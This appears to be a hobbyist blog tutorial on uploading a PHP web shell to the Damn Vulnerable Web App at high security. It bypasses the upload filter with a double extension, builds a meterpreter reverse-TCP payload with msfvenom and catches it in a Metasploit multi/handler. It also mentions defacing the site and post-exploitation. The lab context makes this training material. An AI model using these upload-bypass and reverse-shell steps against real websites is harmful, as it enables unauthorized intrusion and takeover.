Wednesday, 1 February 2017

Shell Upload with Metasploit(DVWA high security)

Steps and instructions -
Welcome to another tutorial from hacking monks 👽

Today we will be hacking a website by uploading a backdoor php file on high security DVWA using Metasploit, as promised.

First the basic terms -

DVWA - Damn Vulnerable Web App

Used as a dummy website for penetration testing.

Web Shell - A shell (aka here backdoor php) is used to get an interaction command line for using website.

Upload panel - Is the place in a website where you upload profile pic or avatar or GIF. Like Facebook.

Requirements -

* A Kali Machine.

Steps -

* Here I am using DVWA as my target website. In that we have a upload section which is similar to any websites upload panel.

First we will download a simple shell. I downloaded it from git hub by searching for it on google.

After the search I will go to the first website which is github

Now we will download this shell

And it will be inside the download folder.

Copy it to the Desktop and unzip it.

Just open the zipped file and then drag the folder out.

You will get a PHP file inside the folder.

Now we will try to upload the file as it is (without bypassing any filter)

* In the DVWA we have an upload panel. I will upload this file there

I will browse through the folders and upload it

As I uploaded the file I got an error

As expected. The security is high.

Thus we have to bypass the upload filters.

* We have to rename our PHP file to shell.php.jpg

And when I upload it, surprisingly the panel accepted the file.

This means that DVWA has low security in a high security mode.

If you have watched my low and medium level security shell upload tutorial, by now you also have known that it is true.

We had to intercept our request and bypass size and name extension filters for medium level security.

Anyways we will move on.

Lets try and access the shell.

* Copy the file path it is showing

Now delete the URL after where it says /dvwa/

And paste the path and access the shell

You will get this kind of a shell interface.

Here you can access the website like the admins do.

Here you can conduct post exploitation or deface the website.

Here you can try out your commands.

Now we will make a payload and upload it on the target website. To get meterpreter sessions on Metasploit

We will build our own shell using MSFvenom.

* Open a terminal and type in 

"msfvenom -p php/meterpreter_reverse_tcp LHOST=(your IP) LPORT=4444 -f raw > Desktop/name.php"

Here -p is payload option,

LHOST is your listening IP address (your IP),

LPORT is the port you will be listening to.

Save it on desktop and name it anything with a .php extension

It will create a payload

It will give you an error like this. Its OK as long as you get the payload.

Note - The error should be the error which you are seeing on the above picture.

As we already know that DVWA will not upload the extension .php.

So we need to rename our backdoor with an extension of .jpg

Now we will run Metasploit to set it up.

Open new terminal and type "msfconsole" or use the shortcut menu to get into metasploit console.

Now we need to set up

type in "use multi/handler"

"set payload php/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"

then finally 

"exploit -j -Z"

This will be listening to establish a connection

Mean while we have to upload our php file on the target website

It will upload as we had renamed our file extension.

Now copy the URL and paste it and see if its uploaded or not.

It will not show you anything, but ....

When we move back to Metasploit, we will get a session open

If you want to see the active sessions type in "sessions -i"

This will show you the active sessions. You will get ID's

If you want to access an active session, type "session -i (ID no)"

Say shell and do what ever you want to do man

Thank you guys for reading this tutorial. I will continue these upload tutorials as we have lots of filters to bypass.
If you have missed my last tutorial on Upload shell,

See them here -

Until then have a safe hack......

Other posts -